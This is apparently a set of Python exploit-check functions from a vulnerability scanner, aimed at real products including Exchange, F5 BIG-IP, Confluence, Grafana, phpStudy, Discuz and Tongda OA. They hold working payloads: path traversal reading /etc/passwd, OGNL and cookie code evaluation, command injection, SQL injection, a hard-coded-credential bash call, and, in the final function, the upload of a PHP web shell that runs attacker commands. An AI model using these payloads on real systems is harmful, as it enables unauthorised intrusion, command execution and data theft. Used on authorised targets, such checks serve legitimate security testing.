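def poc(url):
    """Check whether ``url`` serves ``/owa`` and answers the autodiscover/MAPI probe.

    Args:
        url: Target host or URL; ``https://`` is prepended when no scheme is
            present, then the value is normalised by ``get_standard_url``.

    Returns:
        True when ``/owa`` answers 200 and the second request answers 200 with
        "Exchange" in its body; False otherwise, including on any request error.
    """
    if not url.startswith("http"):
        url = "https://" + url
    url = get_standard_url(url)
    # NOTE(review): the two "[email protected]" fragments look like an artifact of
    # e-mail obfuscation in the captured page rather than the original literal;
    # they are left untouched because the intended value cannot be recovered here.
    probe = (
        url
        + "/autodiscover/[email protected]/mapi/nspi/"
        + "?&Email=autodiscover/autodiscover.json%[email protected]"
    )
    try:
        # TLS verification is disabled and redirects are not followed for both requests.
        r1 = request.get(url + "/owa", timeout=5, verify=False, allow_redirects=False)
        if r1.status_code != 200:
            return False
        r2 = request.get(probe, timeout=5, verify=False, allow_redirects=False)
        return r2.status_code == 200 and "Exchange" in r2.text
    except Exception:
        # Connection and timeout errors are reported as "no hit".
        return False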
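def poc(url):
    """Return True when ``/current_config/passwd`` answers 200 with "name:passwd" in the body.

    Any request error (timeout, connection failure) is reported as False.
    """
    url = get_standard_url(url)
    try:
        r = request.get(f"{url}/current_config/passwd", timeout=10)
        return r.status_code == 200 and "name:passwd" in r.text
    except Exception:
        return False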
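def poc(url):
    """Return True when ``/debug.php`` answers HTTP 200.

    Only the status code is inspected, so a host that answers 200 for unknown
    paths (a "soft 404") will also be reported as a hit. Request errors are
    reported as False.
    """
    url = get_standard_url(url) + "/debug.php"
    try:
        r = request.get(url, timeout=5)
        return r.status_code == 200
    except Exception:
        return False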
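def poc(url):
    """Probe ``/mgmt/shared/authn/login`` and return its URL when the reply is JSON mentioning an error/message.

    Returns the probed URL (a str) on a hit and False otherwise, so callers
    should test the result for truthiness rather than ``is True``.
    """
    base = get_standard_url(url)
    vuln_url = f"{base}/mgmt/shared/authn/login"
    try:
        # TLS verification is disabled for this request.
        r = request.get(vuln_url, verify=False, timeout=5)
        # A body that is not valid JSON raises here and is treated as "no hit".
        json.loads(r.text)
        if "resterrorresponse" in r.text or "message" in r.text:
            return vuln_url
    except Exception:
        return False
    return False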
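def poc(url):
    """Return True when ``/graph_realtime.php?action=init`` answers 200 and mentions ``poller_realtime.php``.

    Request errors are reported as False.
    """
    url = get_standard_url(url)
    path = url + "/graph_realtime.php?action=init"
    try:
        req = request.get(path, timeout=5)
        return req.status_code == 200 and "poller_realtime.php" in req.text
    except Exception:
        return False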
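def poc(url):
    """Return True when the expression posted to ``/pages/doenterpagevariables.action`` is evaluated server-side.

    The only hit signal is the marker ``aaa{class java.lang.String=null}bbb`` in the
    response body. Everything else, including request errors, is reported as False.
    """
    try:
        url = get_standard_url(url) + "/pages/doenterpagevariables.action"
        params_post = {
            "queryString": "aaa\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022]}+\\u0027bbb",
        }
        headers = {
            "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        response = requests.post(url, data=params_post, headers=headers, timeout=5)
        return "aaa{class java.lang.String=null}bbb" in response.text
    except Exception:
        return False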
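def poc(url):
    """Two-step check: fetch ``target + url_payload``, then look for "bug exist" at ``/secquan.php``.

    ``url_payload`` is read from module scope. Returns the ``/secquan.php`` URL on a
    hit and False otherwise; request errors are reported as False.
    """
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    target = get_standard_url(url)
    first = target + url_payload
    second = target + "/secquan.php"
    try:
        # TLS verification is disabled and redirects are not followed.
        res = request.get(first, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200:
            res2 = request.get(second, headers=headers, timeout=5, allow_redirects=False, verify=False)
            if "bug exist" in res2.text:
                return second
    except Exception:
        return False
    return False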
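def poc(url):
    """Try the ``..%2F`` path-traversal URL under ``/public/plugins/<plugin>/`` for each listed plugin.

    Returns the first URL whose response is 200 and contains "root:x:", else False.
    A request error for one plugin does not stop the loop.
    """
    plugins = (
        "cloudwatch", "dashlist", "elasticsearch", "graph", "graphite", "heatmap",
        "influxdb", "mysql", "opentsdb", "pluginlist", "postgres", "prometheus",
        "stackdriver", "table", "text",
    )
    base = get_standard_url(url)
    for plugin in plugins:
        vuln_url = f"{base}/public/plugins/{plugin}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd"
        try:
            # TLS verification is disabled for this request.
            r = request.get(vuln_url, verify=False, timeout=5)
            if r.status_code == 200 and "root:x:" in r.text:
                return vuln_url
        except Exception:
            continue
    return False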
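def poc(url):
    """Check ``/forum.php`` for a cookie-driven code-evaluation issue.

    The first request's ``Set-Cookie`` header is split on space, ``=`` and ``,``;
    the first token containing "language" is reused as a cookie name carrying
    ``'.phpinfo().'``. Returns True only when the second response contains
    "PHP Version"; False when no such cookie exists, on no match (the original
    fell through and returned None here), or on any request/header error
    (a missing ``Set-Cookie`` raises KeyError and is caught).
    """
    url = get_standard_url(url) + "/forum.php"
    try:
        r = request.get(url, timeout=5)
        tokens = re.split(" |=|,", r.headers['Set-Cookie'])
        field = [t for t in tokens if "language" in t]
        if not field:
            return False
        cookie = {field[0]: "'.phpinfo().'"}
        r = request.get(url, cookies=cookie, timeout=5)
        return "PHP Version" in r.text
    except Exception:
        return False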
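def poc(url):
    """Return the normalised URL when ``/owa/auth/x.js`` answers 500 with "NegotiateSecurityContext" in the body.

    ``https://`` is prepended when ``url`` has no scheme. Returns False on no
    match or on any request error.
    """
    if not url.startswith("http"):
        url = "https://" + url
    url = get_standard_url(url)
    try:
        vul_url = url + "/owa/auth/x.js"
        headers = {
            'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'
        }
        # TLS verification is disabled for this request.
        resp = request.get(vul_url, headers=headers, timeout=5, verify=False)
        if resp.status_code == 500 and 'NegotiateSecurityContext' in resp.text:
            return url
    except Exception:
        return False
    return False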
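def poc(url):
    """Return the original ``url`` when the site root answers 200 with a body starting "phpstudy_backdoor_flag".

    The ``Accept-Charset`` header carries a base64 value (it decodes to a PHP
    ``system('echo phpstudy_backdoor_flag');`` call); the body prefix checked
    below is that echo. Note the un-normalised ``url`` argument is returned, not
    ``target``. Request errors are reported as False.
    """
    head = {
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Charset': 'c3lzdGVtKCdlY2hvIHBocHN0dWR5X2JhY2tkb29yX2ZsYWcnKTs=',
    }
    target = get_standard_url(url)
    try:
        res = request.get(url=target, headers=head, timeout=5, allow_redirects=False)
        if res.status_code == 200 and res.text.startswith("phpstudy_backdoor_flag"):
            return url
    except Exception:
        return False
    return False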
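def poc(url):
    """POST a command-injection test to ``/webadm/?q=moni_detail.do&action=gragh`` and return True when "root:x:0:0" comes back.

    ``https://`` is prepended when ``url`` has no scheme. Returns False on no
    match or on any request error.
    """
    if not url.startswith("http"):
        url = "https://" + url
    url = get_standard_url(url)
    vuln_url = url + '/webadm/?q=moni_detail.do&action=gragh'
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = "type='|cat /etc/passwd||'"
    try:
        # TLS verification is disabled for this request.
        response1 = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)
        return response1.status_code == 200 and 'root:x:0:0' in response1.text
    except Exception:
        return False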
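def poc(url):
    """Try every (url_payload*, data_payload*) pair from module scope against ``target``.

    Returns ``"<url>\\tpayload:<data>"`` for the first POST that answers 200 with a
    body containing none of ";</script>", "Login.jsp" or "Error"; False when no
    pair matches. A request error for one pair moves on to the next.
    """
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    target = get_standard_url(url)
    url_payloads = (url_payload1, url_payload2, url_payload3, url_payload4)
    data_payloads = (data_payload1, data_payload2, data_payload3)
    rejected = (";</script>", "Login.jsp", "Error")
    for url_payload in url_payloads:
        full_url = target + url_payload
        for data_payload in data_payloads:
            try:
                res = request.post(full_url, data=data_payload, headers=headers,
                                   timeout=5, allow_redirects=False)
                if res.status_code == 200 and not any(m in res.text for m in rejected):
                    return full_url + "\tpayload:" + data_payload
            except Exception:
                continue
    return False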
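def poc(url):
    """POST ``payload1`` and ``payload2`` (module scope) to ``target + url_payload`` and classify the backend.

    On a response containing "系统提醒工作流" and not "403", returns ``target + "\\tmssql"``
    when the payload contains "@@version", else ``target + "\\toracle"``. Returns
    False when neither payload matches; a request error skips to the next payload.
    """
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    target = get_standard_url(url)
    full_url = target + url_payload
    for payload in (payload1, payload2):
        try:
            res = request.post(full_url, data=payload, headers=headers, timeout=5, allow_redirects=False)
            if "系统提醒工作流" in res.text and "403" not in res.text:
                # "@@version" is the MSSQL-specific token; anything else is treated as Oracle.
                return target + ("\tmssql" if "@@version" in payload else "\toracle")
        except Exception:
            continue
    return False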
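def poc(host, ports=None):
    """Resolve ``host`` and run every check named in ``poc_list`` against each address, one thread per check.

    Args:
        host: Hostname or URL, normalised by ``get_standard_url`` and resolved by ``url2ip``.
        ports: Optional port list forwarded to each check; ``None`` or empty means the
            check is called with only ``(ip, result)``. The default was a shared mutable
            ``[]``; ``None`` is behaviour-compatible and avoids cross-call state.

    Returns:
        The shared ``result`` list the checks append to. The element shape is defined
        by the individual check functions, not here.
    """
    poc_list = ('redis', 'mongo', 'genkins', 'memcached', 'jboss', 'zookeeper', 'rsync',
                'couchdb', 'elasticsearch', 'hadoop', 'jupyter', 'docker', 'ftp')
    host = get_standard_url(host)
    result = []
    threads = []
    for ip in url2ip(host):
        args = (ip, result, ports) if ports else (ip, result)
        # Each check function is looked up by name in module globals.
        threads.extend(threading.Thread(target=globals()[name], args=args) for name in poc_list)
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return result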
def poc(url):
    """Return True when ``/mgmt/tm/util/bash`` accepts the fixed Basic-auth header and reports a command result.

    The request carries a hard-coded ``Authorization: Basic`` value and an empty
    ``X-F5-Auth-Token``; a 200 reply containing "commandResult" is the hit signal.
    TLS verification is disabled. Request errors are printed and reported as False.
    """
    base = get_standard_url(url)
    endpoint = base + "/mgmt/tm/util/bash"
    user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0'
    headers = {
        'User-Agent': user_agent,
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M=',
    }
    body = json.dumps({'command': 'run', 'utilCmdArgs': '-c id'})
    try:
        reply = request.post(url=endpoint, data=body, headers=headers, verify=False, timeout=5)
        hit = reply.status_code == 200 and 'commandResult' in reply.text
    except Exception as err:
        print(err)
        return False
    return True if hit else False
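def poc(url):
    """Normalise ``url`` and delegate to ``attack_yapi(url).verify_yapi`` with a fresh session.

    The ``requests.Session`` was previously never closed; the ``with`` block
    releases its connection pool once ``verify_yapi`` returns.
    """
    url = get_standard_url(url)
    attack = attack_yapi(url)
    with requests.Session() as s:
        return attack.verify_yapi(s)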
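def poc(url):
    """Upload a PHP file through ``/ispirit/im/upload.php``, then reference it via ``/ispirit/interface/gateway.php``.

    The first POST is a raw multipart body with a fixed boundary whose ATTACHMENT
    part is PHP source; the upload reply is expected to contain ``2003_<name>|``,
    from which ``name`` is extracted. The second POST points ``gateway.php`` at
    ``../../../general/../attach/im/2003/<name>.f.jpg`` with ``f=echo fffhhh`` and
    looks for the marker ``fffhhh`` in the reply.

    Returns the normalised URL on a hit and False otherwise. Request errors are
    now reported as False (the original fell through and returned None).
    """
    try:
        url1 = get_standard_url(url) + '/ispirit/im/upload.php'
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "X-Forwarded-For": "127.0.0.1",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"
        }
        data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
        # TLS verification is disabled for both requests.
        result = request.post(url1, headers=headers, data=data, timeout=5, verify=False)
        # Raw string: "\|" in a normal literal is an invalid escape (SyntaxWarning on
        # newer Pythons) that happened to evaluate to the same two characters.
        name = "".join(re.findall(r"2003_(.+?)\|", result.text))
        url2 = get_standard_url(url) + '/ispirit/interface/gateway.php'
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "X-Forwarded-For": "127.0.0.1",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        data = {
            "json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name),
            "f": "echo fffhhh"
        }
        result = request.post(url2, headers=headers, data=data, timeout=5, verify=False)
        if result.status_code == 200 and 'fffhhh' in result.text:
            return get_standard_url(url)
        return False
    except Exception:
        return False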